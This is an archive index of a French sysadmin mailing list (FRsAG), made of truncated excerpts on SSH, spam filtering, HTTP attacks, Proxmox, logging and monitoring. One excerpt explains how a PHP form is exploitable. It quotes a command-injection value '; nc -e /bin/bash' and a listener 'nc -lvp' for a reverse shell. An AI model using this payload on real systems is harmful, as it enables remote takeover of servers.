[FRsAG] Re: Container hacké, que faire

Bonjour L'outils trivy (https://github.com/aquasecurity/trivy) permet de détecter les vulnérabilités connues inclues dans les containers. David Dr David ANSART Formateur en Informatique : Réseau Système Cybersécurité Développement C/C++ https://github.com/Raizo62 davi

[FRsAG] Re: Container hacké, que faire

Xav, Je crois que Franck ne sait pas quel container est fautif… J’ai envie de dire d’éteindre tous les containers, les allumer un par un, et prendre une trace réseau à chaque fois à la sortie de chaque container pour tenter de détecter du traffic anormal. Je suppose qu’ils sont en privée et que

[FRsAG] Re: Longevite des OS

n fait cette action sur tous les serveurs, prod++ et prod-- David On Sun, 8 Sep 2024 15:22:12 +0200 David RIBEIRO wrote: > Salut David, > > Et comment tu gères une maj 1 fois tous les 7 jours ? Ansible full > auto calendriarisé ? > Quand je dis gérer, je parle de gérer le

[FRsAG] Re: Longevite des OS

Salut David, Et comment tu gères une maj 1 fois tous les 7 jours ? Ansible full auto calendriarisé ? Quand je dis gérer, je parle de gérer les serveurs PROD++ des serveurs moins PROD++ :) Merci pour tes lumières. David Le sam. 7 sept. 2024 à 11:00, David Durieux a écrit : > Salut, >

[FRsAG] Re: Longevite des OS

je préfère avoir un problème de ce genre plutôt que devoir gérer des catastrophes genre une faille exploitée. David On Fri, 6 Sep 2024 22:05:31 +0200 Laurent Barme <2...@barme.fr> wrote: > > Le 06/09/2024 à 15:15, Paul Rolland (ポール・ロラン) a écrit : > … > > Tiens, d'aille

[FRsAG] Re: [BIZ ]Recherche grossiste cordons RJ45

fs.com aussi. En plus, ils ont ce modèle thin qui est bien agréable. Je doute que la quantité leur fasse peur, faut juste voir le délai. > Le 5 sept. 2024 à 11:57, [SAB SYSTEM] a écrit : > > Bonjour Alain, > > Je leur ai acheté des câbles HDMI en grosses quantités, et c'était p

[FRsAG] Re: Augmentation des deferred vers gmail

Rien de tel ici. Après, Gmail avertit pas mal quand ton compte est déjà à 13 Go occupés sur 15Go (pour la plupart des utilisateurs, 2Go, c’est 1 à 4 ans de mail), donc on peut penser qu’ils s’en foutent un peu de leur mail :) David > Le 4 sept. 2024 à 11:33, Kevin Cousin via FRsAG a éc

[FRsAG] Re: OpenSSH Debian12 vs Debian 8

, donc Ikoula a modifié un truc. Ma hostkey était de 2048 bits, ils avaient peut-être forcé à 4096 minimum. Je crois que je n’aurais jamais le fin mot de l’histoire…. David > Le 3 sept. 2024 à 15:23, Pierre Colombier via FRsAG a écrit > : > > ça me rappelle le problème que j&#

[FRsAG] Re: OpenSSH Debian12 vs Debian 8

Ben je vais je pense monter un serveur interne en Debian 9 ou 10, qui fera l’intermédiaire… David > Le 3 sept. 2024 à 15:31, Pierre-Elliott Bécue a écrit : > > David Ponzone wrote on 03/09/2024 at 14:13:11+0200: > >> (Debian 4, oui je sais, mais on fait pas toujours ce

[FRsAG] Re: OpenSSH Debian12 vs Debian 8

Oui, si c’était le client en version supérieure, mais là, c’est l’inverse: je maitrise le client qui est outdated, et ils ont dû mettre à jour le serveur sans trop réfléchir (=anticiper les vieux clients qui se baladent et qui sont pas simples à mettre à jour). David > Le 3 sept. 2024 à 14

[FRsAG] Re: OpenSSH Debian12 vs Debian 8

1-5), soit à cause de mon ticket au support soit à cause de mon post ici. Merci pour le retour en tout cas David > Le 3 sept. 2024 à 14:25, Samuel Thibault a > écrit : > > Bonjour, > > David Ponzone, le mar. 03 sept. 2024 14:13:11 +0200, a ecrit: >> Est-ce quelqu’

[FRsAG] OpenSSH Debian12 vs Debian 8

preneur). Merci PS: je précise que je n’ai pas la main sur le serveur qui a mis à jour la Debian 12, il s’agit de serveurs de backup chez Ikoula. David ___ Liste de diffusion du %(real_name)s http://www.frsag.org/

[FRsAG] Re: SpamAssassin GB_CUSTOM_HTM_URI

C’est pas faux. Et bien figurez-vous que le numéro 1 français (je pense) du mass mailing propre ne sait pas gérer un uid dans l’unsubscribe… David > Le 19 juil. 2024 à 22:07, Arnaud Launay via FRsAG a écrit : > > Le Fri, Jul 19, 2024 at 08:54:57PM +0200, David Ponzone a écrit: &g

[FRsAG] Re: SpamAssassin GB_CUSTOM_HTM_URI

> Le 19 juil. 2024 à 20:50, Arnaud Launay via FRsAG a écrit : > > Le Fri, Jul 19, 2024 at 08:33:51PM +0200, David Ponzone a écrit: >> Bonsoir, >> >> Je cherche à comprendre le flag GB_CUSTOM_HTM_URI que SpamAssassin met à 1.5 >> sur un mail que je reçois. >

[FRsAG] Re: SpamAssassin GB_CUSTOM_HTM_URI

Merci! Dans la pratique, j’ai l’impression qu’il est positionné avec 1.5 comme valeur si le mail contient du français et de l’anglais (ou peut-être de l’anglais et une autre langue). David > Le 19 juil. 2024 à 20:49, neo futur a écrit : > > effectivement c est nouveau et pa

[FRsAG] SpamAssassin GB_CUSTOM_HTM_URI

Bonsoir, Je cherche à comprendre le flag GB_CUSTOM_HTM_URI que SpamAssassin met à 1.5 sur un mail que je reçois. Y a une doc qqpart de ce flag ? Merci David ___ Liste de diffusion du %(real_name)s http://www.frsag.org/

[FRsAG] Re: ***SPAM*** Re: Bloquer attaque http, ip multiple

Rémy, Oui c’est un peu la base de fail2ban, mais ça marche pas si l’IP source change à chaque paquet hein ? Ou alors y a un nouveau module que je connais pas. David > Le 28 juin 2024 à 10:04, Rémy Duchet (Perso) a écrit : > > Salut, > > Avec fail2ban tu peux faire des ja

[FRsAG] Re: Bloquer attaque http, ip multiple

plusieurs viennent du même préfixe, bloquer le préfixe (pas l’AS entier). Faut voir si les attaques DO viennent du même préfixe. Tu peux aussi regarder si ces IP sont listées chez Crowdsec. Si oui, remplacer fail2ban par crowdsec est une option. David > Le 28 juin 2024 à 09:41, MJX a éc

[FRsAG] Re: Bloquer attaque http, ip multiple

ru.com <http://whois.cymru.com/>, et s’il y a trop d’IP dans le même AS et si l’AS n’est pas whitelisté (ou le pays), on ban tous les préfixes de l’AS (en tapant dans un route-reflector qu’on a sous la main, ou dans les bases des RIR). David > Le 25 juin 2024 à 20:14, David M via

[FRsAG] Re: Bloquer attaque http, ip multiple

ST Nicolas Parpandet via FRsAG a écrit : > > Hello, > > Oui ca existe, tu peux écrire tes propres règles "fail2ban" 😉 > > A+ > > Nicolas > > From: David M via FRsAG > Sent: Tuesday, June 25, 2024 18:27 >

[FRsAG] Re: Bloquer attaque http, ip multiple

Load-balancer pour force-router les clients venant d’IP exotiques sur un autre VPS/LXC qui fonctionne comme le "master" mais sera sacrifié en perfs. Et les clients en FR/EU/autres sont sur le bon VPS qui marche alors normalement. David > Le 25 juin 2024 à 19:20, Kevin Lab

[FRsAG] Bloquer attaque http, ip multiple

#x27;ai pas la main sur les connexions réseaux...ce sont des VPS et/ou des Proxmox avec des LXC qui ce fond attaquer... David -- https://retzo.net/ Tél port : 0663691604 Tél fix : 0972199940 Lundi|Mardi|Jeudi 9h30-16h ou Mercredi|Vendredi 9h30-12h ___ Liste de diffusion du %(real_name)s http://www.frsag.org/

[FRsAG] Re: Attaques http tous azimuts en hausse ou pas ?

> Le 24 mai 2024 à 16:52, Daniel Caillibaud a écrit : > > Le 24/05/24 à 16:03, David Ponzone a écrit : >> Tu peux pas geofilter les pays douteux ? > > Ça ajoute une couche et… Euh, nginx sait faire ça, y a pas de surcouche. >> Je doute que les visiteurs habituels d

[FRsAG] Re: Attaques http tous azimuts en hausse ou pas ?

Tu peux pas geofilter les pays douteux ? Je doute que les visiteurs habituels du site viennent de RU ou CN…. David > Le 24 mai 2024 à 15:45, Daniel Caillibaud a écrit : > > Le 24/05/24 à 12:33, darcosion via FRsAG a écrit : >> Vu la description, cela ressemble à un ciblage test

[FRsAG] Re: Attaques http tous azimuts en hausse ou pas ?

C’est quoi la cible ? Une IP exposée (site web ou autre), ou random ? Les sources sont random ? Spoofées ? géo-filtrables ? David > Le 24 mai 2024 à 13:30, Daniel Caillibaud a écrit : > > Bonjour, > > Je bosse pour une asso qui n'a rien de politique ni d'essentiel,

[FRsAG] Re: Filtrage de message au runtime

Totalement. Par contre (j’insiste), je ne vois jamais aucune discussion sur l’usage du plugin 2FA Google avec openssh. Y a des raisons de l’éviter ? David > Le 2 mai 2024 à 17:37, Ludovic Levet via FRsAG a écrit : > > C'est pas faux. C'est jamais une bonne idée de d

[FRsAG] Re: [SPAM] Re: Filtrage de message au runtime

vient: sudo ipset ……; nc …… Donc le nc est lancé en dehors du sudo David ___ Liste de diffusion du %(real_name)s http://www.frsag.org/

[FRsAG] Re: [SPAM] Re: Filtrage de message au runtime

clé publique+2FA. David > Le 2 mai 2024 à 06:45, Julien Reitzel a écrit : > > Hello, > > au vu du morceau de php indiqué, il suffit d'envoyer le formulaire avec : > ; nc -e /bin/bash > > du côté attaquant lancer : > $ nc -lvp > > Et voilà un

[FRsAG] Re: Filtrage de message au runtime

C’est pas une critique mais ça veut dire que tu fais plus confiance à l’auth HTTPS qu’à l’auth SSH ? David > Le 1 mai 2024 à 20:34, Ludovic LEVET via FRsAG a écrit : > > Il ne faut jamais laisser le port ssh directement sur le net sans filtrage de > la source ... > > M

[FRsAG] Re: Filtrage de message au runtime

(CQFD, abus en petit blanc d’Oléron pendant les HO) De virer syslogd et mettre rsyslogd. David > Le 29 avr. 2024 à 11:08, Stéphane Rivière a écrit : > > Le 28/04/2024 à 19:32, David Ponzone a écrit : >> Mais pourquoi tu fais pas ce que je te dis ? :) > T'as dis quo

[FRsAG] Re: Filtrage de message au runtime

Bonjour As tu essayé le : kernel.printk = 3 4 1 7 ? (C'est ce qui est choisi, depuis longtemps, dans la distribution LiveRaizo) David Dr David ANSART Formateur en Informatique : Réseau Système Cybersécurité Développement C/C++ https://github.com/Raizo62 david.ans...@seineetmarne.c

[FRsAG] Re: Filtrage de message au runtime

Ouais, et je connais les petits blancs d’Oléron. Bien frais, ça se boit plutôt tranquille et sans modération :) David > Le 29 avr. 2024 à 10:31, Paul Rolland (ポール・ロラン) a écrit > : > > Hello, > > On Sun, 28 Apr 2024 19:32:08 +0200 > David Ponzone wrote: > >>

[FRsAG] Re: Filtrage de message au runtime

Mais pourquoi tu fais pas ce que je te dis ? :) David > Le 28 avr. 2024 à 19:24, Stéphane Rivière a écrit : > > Un petit retex de la manip, qui ne semble pas concluante... > > 1265 25/04/2024 18:37:33 sysctl -w kernel.printk=4417 > 1266 25/04/2024

[FRsAG] Re: Filtrage de message au runtime

David > Le 25 avr. 2024 à 18:48, Stéphane Rivière a écrit : > > Hello again, > > Selon la suggestion (qui me convient bien) de David, je regarde ce que > propose Debian par défaut sur une instance de test... > > sysctl kernel.printk > kernel.printk = 7417

[FRsAG] Re: Filtrage de message au runtime

Tu peux toujours mettre sur le port 22 un honeypot avec un shell sandboxé, qui a comme prompt: WOPR> > Le 25 avr. 2024 à 18:27, Laurent Barme <2...@barme.fr> a écrit : > > > Le 25/04/2024 à 17:29, Sebastien Guilbaud a écrit : > >> c'est de la sécurité par l'obscurité, > C'est la mesure la pl

[FRsAG] Re: Filtrage de message au runtime

Bon, j’ai pris 5 min, et moi j’ai rien sur la console. Parce que j’ai rsyslogd partout. Ca doit être la conf par défaut de syslogd qui envoie des trucs sur /dev/console. Stéphane, tu as donc les 2 solutions possibles: -mettre rsyslog -reconfigurer syslogd David > Le 25 avr. 2024 à 17:34, P

[FRsAG] Re: Filtrage de message au runtime

messages au kernel. Faudrait essayer :) David > Le 25 avr. 2024 à 15:16, Paul Rolland (ポール・ロラン) a écrit > : > > Hello, > > On Thu, 25 Apr 2024 14:56:32 +0200 > David Ponzone wrote: > >> https://unix.stackexchange.com/questions/13019/description-of-

[FRsAG] Re: Filtrage de message au runtime

https://unix.stackexchange.com/questions/13019/description-of-kernel-printk-values > Le 25 avr. 2024 à 14:46, Stéphane Rivière a écrit : > > Bonjour à toutes et tous, > > J'ai, comme tout le monde j'imagine,

[FRsAG] Re: [FRnOG] [JOBS] Reconversion dans les métiers de l'informatique - Enquête métier

gent quand même. Pas si on vise le CAC40 évidemment. Je crois me rappeler que quelqu’un a mis une annonce de job sur FRnOG ou FRsAG il y a peu, dans laquelle il précisait que sa boite n'avait rien à faire des diplômes. S’il se reconnait, il pourra peut-être nous donner son point de

[FRsAG] Re: [FRnOG] [ALERT] Compromission de lzma

https://youtu.be/jqjtNDtbDNI David Ponzone > Le 30 mars 2024 à 15:37, Jean-Yves LENHOF via FRsAG a écrit > : > >  >> Le 30/03/2024 à 12:19, Jean-Yves LENHOF via FRsAG a écrit : >> >> Le 30/03/2024 à 12:11, Pierre-Philipp Braun a écrit : >>>> De

[FRsAG] Re: [FRnOG] [ALERT] Compromission de lzma

On Sat, 30 Mar 2024 10:58:42 +0100 David Ponzone wrote: ou bien de tout passer sous FreeBSD car c'est pas impacter, oui c'est du troll gratuit ^_^, quoique... David > Ou alors de temporiser un peu en évitant d’avoir le doigt sur apt > upgrade ? > > > Le 30 mars 2024

[FRsAG] Re: [FRnOG] [ALERT] Compromission de lzma

Ou alors de temporiser un peu en évitant d’avoir le doigt sur apt upgrade ? > Le 30 mars 2024 à 10:10, Laurent Barme <2...@barme.fr> a écrit : > > > Le 30/03/2024 à 04:10, Tim Dobson a écrit : > >> >> Dans tous les cas, comme toujours, le meilleur conseil est "mettez à jour >> votre système de

[FRsAG] Re: La mise à jour automatique des certificats LE est un cheval de Troie.

> On se croirait sur FRnOG les jours de grands vents... On peut se mettre à > plusieurs pour taper sur Laurent mais bon... > > Il a son avis non orthodoxe et/ou très discutable mais bon... La réaction me > semble est un tantinet excessive. > J’ai cru que quelqu’un avait mis en place une passer

[FRsAG] Re: [FSSAG] Outils de ticket basic

https://freescout.net/Pas mal aussi!David PonzoneLe 22 mars 2024 à 11:28, Rémy Dernat a écrit : Bonjour, Je confirme que Zammad est très bien, mais pas forcément très léger. Sinon, en petit outil de helpdesk, il y a aussi sysaid/hesk. Rémy On

[FRsAG] Re: [FSSAG] Outils de ticket basic

Request Tracker. > Le 21 mars 2024 à 12:56, Anthony Frnog a écrit : > > Bonjour à vous, > > > Je suis à la recherche d un outil opensource permettant de créer des tickets > sav en fonction d un compte client et qui permet aussi d envoyer des mails > avec des templates prédéfinis. > > Que

[FRsAG] Re: API SMS des opérateurs tel

n numéro virtuel chez OVH pour la gestion des SMS > automatisés ; c'est peut-être une autre option intéressante pour toi. > Non, ça n’existe plus suite à modification de la régulation. Il y aura bientôt (…) des 09 (oui je sais) pour cet usage, bravo l’ARCEP. David _

[FRsAG] Re: La mise à jour automatique des certificats LE est un cheval de Troie.

Le 20/03/2024 à 11:14, Barth DELUY a écrit : D'autant plus qu'il est tout à fait possible d'utiliser certbot pour lui faire simplement renouveler les certificats, sans lui donner les droits sur la conf apache/nginx/... Un script maison qui lance le renouvellement, vérifie si les fichiers ont

[FRsAG] Re: La mise à jour automatique des certificats LE est un cheval de Troie.

sujet avant que LE prenne le marché. Le côté négatif de LE c’est que ça permet à n’importe quel margoulin de présenter un site avec une facade clean en apparence. David ___ Liste de diffusion du %(real_name)s http://www.frsag.org/

[FRsAG] Re: La mise à jour automatique des certificats LE est un cheval de Troie.

> Le 20 mars 2024 à 14:40, Laurent Barme <2...@barme.fr> a écrit : > > Indépendamment, je trouve cela surprenant cette limite de validité à 90 jours > pour les certificats LE. Sans parler d'une sollicitation moindre de leurs > serveurs, si cela avait été un an, nous n'aurions jamais eu cette di

[FRsAG] Re: Gérer les versions de ses cafetières ?

Bonjour, un logiciel de gestion de CMDB & de gestion des changements devrait répondre à ton besoin. David On Wed, 20 Mar 2024 12:21:50 +0100 nicolas.fr...@ecarnot.net wrote: > Bonjour, > > Comme bon nombre d'entre vous, je m'efforce de garder à jour les > version

[FRsAG] Re: Gérer les versions de ses cafetières ?

;assume), je suis plutôt à la recherche d'un outil simple qui permettrait de > simplement prendre note de toute action d'upgrade, de consulter les versions > les plus anciennes, et d'estimer le nombre d'actions par période. > > Évidemment, si

[FRsAG] Re: Serveur S3

xy peut faire ce que je veux (en java) - S3 ninja - s3rver (pas d'update au projet depuis 3 ans) - fake S3 (pas d'update au projet depuis 5 ans) Cela dit, Minio est le seul qui soit en "production ready", les autres sont "experimental" (rclone) ou "prévus

[FRsAG] [jobs] CDD Ingénieur-e systèmes Linux pour l'Université Clermont Auvergne à Clermont-Ferrand

Bonjour à tous, Le Mésocentre Clermont Auvergne et la DSI de l'Université Clermont Auvergne recrutent un ingénieur ou une ingénieure systèmes Linux pour un CDD de 18 mois. Il ou elle intégrera une équipe d'une quinzaine de personnes au sein du Mésocentre et du Pôle Infrastructures. Plus de dé

[FRsAG] Re: Gestion des glue records lors d'une renumérotation deréseau

Ben tu vois, le DNS, c’est comme ton mail :) Tu fais un doublon dans le nouveau DC et c’est bon. > Le 21 févr. 2024 à 14:50, Pep a écrit : > > > Je reposte le sujet, désolé pour le hijacking ... > > Bonjour la liste, > > Nous sommes une société d'édition de logiciels et nous recueillons des >

[FRsAG] Re: Gestion des glue records lors d'une renumérotation deréseau

Il doit manquer un info, car je vois mal ce qui empêche de remonter des NS sur le nouveau DC tout de suite (ou ailleurs, provisoirement). David > Le 21 févr. 2024 à 14:35, Pep a écrit : > > > Bonjour la liste, > > Nous sommes une société d'édition de logiciels

[FRsAG] Re: Serveur S3

Re- Il y a déjà l'infra en place (serveurs dans différents DC, sous ZFS et qui font du send/receive). L'idée est de tester S3 (vs NFS) pour des backups (de pleins de petits fichiers - des mails). David - Mail original - > De: "Etienne Menguy" > À: &quo

[FRsAG] Serveur S3

que (ou locale), pas besoin de contrôle de parité ou EC, juste un serveur S3. J'ai trouvé Minio et Garage (qui font aussi tout ce dont je n'ai pas besoin). Est-ce que vous auriez d'autres outils à proposer ? Merci, David ___ Liste

[FRsAG] Re: [FSSAG] Anydesk hacké

> Le 4 févr. 2024 à 22:01, Arnaud Launay a écrit : > > Le Sun, Feb 04, 2024 at 04:20:58PM +0100, David Ponzone a écrit: >> Oula, le serveur est pour Windows only, j’ai vomi direct :) > > ?? > > Je sais pas si on parle de la même chose, mais le serveur il est pour w

[FRsAG] Re: [FSSAG] Anydesk hacké

ans sa version > gratuite (- de 10 hosts), sans le serveur central car usage léger. Ca fait > 2FA et tout le bazar. Ça me semble pas mal. > > Jacques > > Le 04/02/2024 à 16:01, David Ponzone a écrit : >> Merci pour l’info, depuis le temps que je cherche une alternative

[FRsAG] Re: [FSSAG] Anydesk hacké

Merci pour l’info, depuis le temps que je cherche une alternative sérieuse à TV. Par contre, le client iOS semble avoir un souci (pas primordial). > Le 4 févr. 2024 à 13:30, Arnaud Launay a écrit : > > Le Sat, Feb 03, 2024 at 08:11:36PM +0100, Anthony Frnog a écrit: >> Pour ceux qui n auraien

[FRsAG] OVH et OWA

Pour ceux qui n’ont pas vu, OVH éjecte OWA comme webmail pour les emails Mutu/MX-Plan, au profit de Zimbra. David ___ Liste de diffusion du %(real_name)s http://www.frsag.org/

[FRsAG] Re: Synology Hybrid Share: des retours ?

certains métiers. David Ponzone > Le 10 janv. 2024 à 01:44, Jérémie Parisel a écrit : > >  > Merci Franck, Kevin et Frank pour vos réponses. > > Le 6/01/24 à 13:06, Franck Routier a écrit : >> >> Je ne suis pas un expert de ces problématiques, mais pour mo

[FRsAG] Re: [BIZ] Revendeur de serveur orienté stockage NAS (TrueNAS) ?

Juste 2 commentaires: Montage vidéo et HDD, pas glop Montage vidéo et 1G, pas glop Pour du broke Dell/HP, tu peux contacter harold.sauv...@nisc-info.fr de ma part. > Le 14 déc. 2023 à 13:52, DUVERGIER Claude a > écrit : > > Bonjour, > > Après avoir résol

[FRsAG] Re: Journal.....

Merci pour l’info, c’est à tester pour un usage simple ou avec du docker dessus. Par contre, je suppose que le déploiement d’un soft récent qui attend une Debian 12 doit vautrer. > Le 5 déc. 2023 à 15:47, Dominique Rousseau a écrit : > > Le Tue, Dec 05, 2023 at 03:41:51PM +0100, Davi

[FRsAG] Re: Journal.....

Je voulais pas, j’ai juste installé Proxmox 8 en me disant: chouette, ça va être encore mieux que la 7. En gros: du SDN à gogo, Debian 12 beurk en dessous, et voilà. > Le 5 déc. 2023 à 16:34, Laurent Barme <2...@barme.fr> a écrit : > > > Le 05/12/2023 à 15:27, David Ponzone

[FRsAG] Re: Journal.....

C’est franchement relou. Y a une distri qui ressemble à ce qu’aurait été une Debian sans la transition systemd ? > Le 5 déc. 2023 à 15:37, Christophe Casalegno (Brain 0verride) via FRsAG > a écrit : > > Le mardi 5 décembre 2023, 14:27:46 GMT David Ponzone a écrit : >> Dites

[FRsAG] Journal.....

Dites, c’est moi, ou le remplacement de syslogd par journald est une des plus grandes pitreries de l’histoire de Linux ? ___ Liste de diffusion du %(real_name)s http://www.frsag.org/

[FRsAG] Re: Piloter plusieurs consoles en même temps

tmux ? David > Le 12 sept. 2022 à 12:19, Artur a écrit : > > Salut, > > A une certaine époque j'utilisais un bout d'application qui permettait de > taper des commandes sur plusieurs terminaux en parallèle (pour mettre à jour > plusieurs nœuds d'u

[FRsAG] Question théorique concernant la migration d'un LXC

S’il y a des gurus des LXC ici, J’ai déplacé un LXC d’un Proxmox 6 (Debian 10.6) vers un Proxmox 7 (Debian 11.4) (j’ai donc juste copié le fichier de conf, et le root disk était accessible en NFS). Et ça marche. Je m’attendais à ce que ça crash lamentablement. Donc, je me questionne: -coup de b

[FRsAG] Re: [HS] Recherche hébergeur de mailing-list pour une association

Tu as fait plusieurs essais ? Ça fait penser à du grey-listing. > Le 6 sept. 2022 à 15:10, Guerlais, Patrice (ITOP TD) - AF via FRsAG > a écrit : > > Bonjour, > > je vais faire une réponse globale : merci à tous pour vos réponses, je suis > en train d’évaluer Framaliistes qui semble répondr

[FRsAG] Re: recherche solution relay smtp on premise

es ça > va je trouve. > > Le ven. 26 août 2022, 19:12, David Ponzone <mailto:david.ponz...@gmail.com>> a écrit : > Hmmm Fortinet font partie des constructeurs qui ont fait un +[234][0-9]% sur > le prix de leur matos/licences. > > Autant sur la sécurité c’est difficil

[FRsAG] Re: recherche solution relay smtp on premise

rit : > > Hello, > > Fortimail ? Ça fonctionne, ça fait le trie nécessaire. En gros ça marche sans > ce prendre ma tête. > > Jérôme > > Le ven. 26 août 2022, 14:38, David Ponzone <mailto:david.ponz...@gmail.com>> a écrit : > Je me réponds à moi-même, 8 m

[FRsAG] Re: recherche solution relay smtp on premise

main. Ras le bol de cette cohorte de constructeurs qui profitent de la situation actuelle pour appliquer une inflation majorée sur leurs tarifs. > Le 11 janv. 2022 à 15:32, David Ponzone a écrit : > > >> Le 11 janv. 2022 à 14:58, elpablodelcas...@netcourrier.com a écrit : >&

[FRsAG] Re: Problème avec DNSBL Spamhaus chez Numlog

Comme David (l’autre) l’a dit, Open Resolver pour Spamhaus, c’est: 1.1.1.1 9.9.9.9 (bizarrement, pas Google, L3 ou Cisco, c’est un peu limite comme censure….) Donc ton DNS doit faire un forward à un des 2 DNS CloudfFlare. > Le 26 août 2022 à 12:23, Dominique Rousseau a écrit : > > Le

[FRsAG] Re: Problème avec DNSBL Spamhaus chez Numlog

Haus) bloquent les MTA qui utilisent les resolvers CloudFlare (et certainement d'autres). C'était prévu/annoncé en début d'année et ça semble mis en oeuvre. https://www.spamhaus.com/resource-center/if-you-query-spamhaus-projects-dnsbls-via-clou

[FRsAG] Problème avec DNSBL Spamhaus chez Numlog

de corriger (pour leurs clients) :) Merci! David Ponzone ___ Liste de diffusion du %(real_name)s http://www.frsag.org/

[FRsAG] Re: Qui pour remplacer Nagios en 2022 ?

Bonjour, Pour les stats dans Grafana, on a des centaines de Go de Zabbix dans une base MariaDB, qui est partitionnée par jour et aucun problème de performances pour l'affichage. Cordialement, David On Thu, 28 Jul 2022 16:32:33 +0200 Wallace wrote: > Les arguments de Raphel peuv

[FRsAG] Re: Qui pour remplacer Nagios en 2022 ?

> Le 26 juil. 2022 à 21:33, Mickael Monsieur a > écrit : > > > >> Le 26 juil. 2022 à 20:39, Xavier Beaudouin via FRsAG a >> écrit : >> >> Hello, >> >> Librenms est capable de faire du polling de la même façon de nagios de ports >> SMTP/POP/IMAP, réponses DNS... etc... > > > Oui mais pou

[FRsAG] Re: Qui pour remplacer Nagios en 2022 ?

C’est plus Nagios en dessous ? > Le 26 juil. 2022 à 20:34, Jerome Lien a écrit : > > Je vais peut être me faire taper dessus car personne n'en parle, mais que > pensez-vous de centreon ? > ___ Liste de diffusion du %(real_name)s http://www.frsag.org

[FRsAG] Re: FRsAG Digest, Vol 536, Issue 1

https://www.paessler.com/prtg/pricing > Le 26 juil. 2022 à 20:04, luc le rumeur a écrit : > > Hello, > > Perso on est très satisfait de prtg. Je peux pas dire pour le prix par > contre. > > Luc ___ Liste de

[FRsAG] Re: Qui pour remplacer Nagios en 2022 ?

https://checkmk.com/product/raw-edition ? J’avais commencé à jouer avec, mais pas eu beaucoup de temps pour approfondir (c’est sur la todo 2023: CheckMK peut-il virer LibreNMS ?). Mais ça semble plutôt pas mal. > Le 26 juil. 2022 à 17:32, Mickael MONSIE

[FRsAG] Re: RAID et SSD : hardware ou software ?

https://www.tomshardware.fr/highpoint-propose-des-cartes-raid-nvme-m-2-a-8-ports/ Y a aussi des contrôleurs RAID basés sur des GPU qui arrivent, avec des perfs de fou. David Ponzone > Le 15 juil. 2022 à 12:49, Matic Vari a écrit : > > Peut-on faire du RAID matériel avec des

[FRsAG] Re: RAID et SSD : hardware ou software ?

Faut mettre des cartes très courantes, très dispos en broke et avoir un bon broker. Une carte RAID qui part en vrille, ça doit arriver je dis pas le contraire. Mais ça m’est jamais arrivé. Mais je suis d’accord avec vous sur le fond, je préfèrerais être très à l’aise avec le soft pour faire que

[FRsAG] Re: RAID et SSD : hardware ou software ?

Je mets un bémol purement perso, mais je suis peut-être pas le seul: Les procédures de recovery quand on a une situation anormale, avec / sur un raid soft, que ça soit MDADM ou ZFS, c’est pas forcément trivial quand on le fait pas tous les jours. Je suis personnellement plus serein (peut-être à

[FRsAG] Re: Logs étranges de Corosync

a écrit : > > Bonjour, > > David Ponzone : > [...] >> Je me demandais donc si je dois quand même chercher du côté d’un problème de >> transmission (donc perte d’un keepalive de temps en temps), ou si Coro peut >> avoir un petit bug dans ma version actuelle. &

[FRsAG] Re: Logs étranges de Corosync

Francois R. > Le 13 juin 2022 à 10:12, Dominique Rousseau a écrit : > > Le Sun, Jun 12, 2022 at 07:28:59PM +0200, David Ponzone > [david.ponz...@gmail.com] a écrit: >> Proxmoxien(ne)s, >> >> J???ai 2 Proxmox en cluster (7.1.11, Coro 3.1.5-pve2) qui me font >>

[FRsAG] Logs étranges de Corosync

Proxmoxien(ne)s, J’ai 2 Proxmox en cluster (7.1.11, Coro 3.1.5-pve2) qui me font régulièrement (au moins une fois par jour) ceci: Jun 12 03:04:41 prox1-1 corosync[4379]: [KNET ] link: host: 2 link: 0 is down Jun 12 03:04:41 prox1-1 corosync[4379]: [KNET ] host: host: 2 (passive) best link

[FRsAG] Re: Proxmox: Question concernant l'ordre des /dev/sdX

l’ordre des HD dans la conf proxmox est bien le même que l’ordre pour le guest (ce qui est logique mais depuis le coup de l’UUID, je suis méfiant). Merci! > Le 9 juin 2022 à 18:15, Francois Romieu a écrit : > > Bonjour, > > David Ponzone : >> Oui oui bien sûr, je vais même

[FRsAG] Re: Proxmox: Question concernant l'ordre des /dev/sdX

ex130.png] > > Sent with Proton Mail secure email. > --- Original Message --- > On Thursday, June 9th, 2022 at 6:33 PM, David Ponzone > mailto:david.ponz...@gmail.com>> wrote: > > >> OK mais le problème avec KVM, c’est de savoir si dans les devices en arg

[FRsAG] Re: Proxmox: Question concernant l'ordre des /dev/sdX

quot;%k" > > Pour recuperer les attribus udev pour une paritions > udevadm info -a -n /dev/s|vdX > > [PMsignaturex130.png] > > Sent with Proton Mail secure email. > --- Original Message --- > On Thursday, June 9th, 2022 at 3:28 PM, David Ponzone >

[FRsAG] Proxmox: Question concernant l'ordre des /dev/sdX

Proxmox/KVM Gurus, Quelqu’un peut me confirmer que KVM va toujours mettre le disque scsi0 comme /dev/sda et scsi1 comme /dev/sdb ? Je veux dire ABSOLUMENT toujours! Merci! ___ Liste de diffusion du %(real_name)s http://www.frsag.org/

[FRsAG] Re: [TECH] Solution de sauvegarde Windows (locale + Cloud)

Bonjour, https://c2.synology.com/fr-fr/pricing/backup/business Cdt -Message d'origine- De : Vincent Duvernet Envoyé : jeudi 12 mai 2022 10:25 À : frsag@frsag.org Objet : [FRsAG] [TECH] Solution de sauvegarde Windows (locale + Cloud) Bonjour la team. Suite au crash d'un serveur à caus

[FRsAG] Re: Recherche confrère dans le 56 (Caudan) sur Windows Server 2k19

Avec l’irmc, tu peux pas démarrer sur l’iso de restauration Acronis pour restaurer de ton backup ? David Ponzone > Le 4 mai 2022 à 23:05, Vincent Duvernet a écrit : > > Bonsoir, > > Suite à la désinstall' d'Acronis (sur lequel on a un ticket avec le support), >

[FRsAG] Re: Fuck, l'outil improbable

de est en cours > (prompt "occupé"), comment faire ? > > Cdlt, > > Le 22/04/2022, David Ponzone a écrit : >> Ben tu as le droit de lancer screen aussi sur la console :) >> >>> Le 22 avr. 2022 à 13:24, Matic Vari a écrit : >>> >>> Bonjour

[FRsAG] Re: Fuck, l'outil improbable

ffiné via la base de registre, ds mon cas ca lock si je suis à ~2m du PC) Sous Mac j’aimerai bien la même chose mais je n’ai pas trouvé d’équivalent. — Kevin Le 22 avr. 2022 à 10:45, David via FRsAG a écrit : Il ne faut pas oublier dans ce cas que 'sudo' a une "latence" d'id

[FRsAG] Re: Fuck, l'outil improbable

Ben tu as le droit de lancer screen aussi sur la console :) > Le 22 avr. 2022 à 13:24, Matic Vari a écrit : > > Bonjour, > > Quelqu'un a une solution pour verrouiller la console sous GNU/Linux ? > > Explication : Sur mes serveurs, j'ai pas d'interface graphique. Il > m'arrive parfois de devoir

[FRsAG] Re: Fuck, l'outil improbable

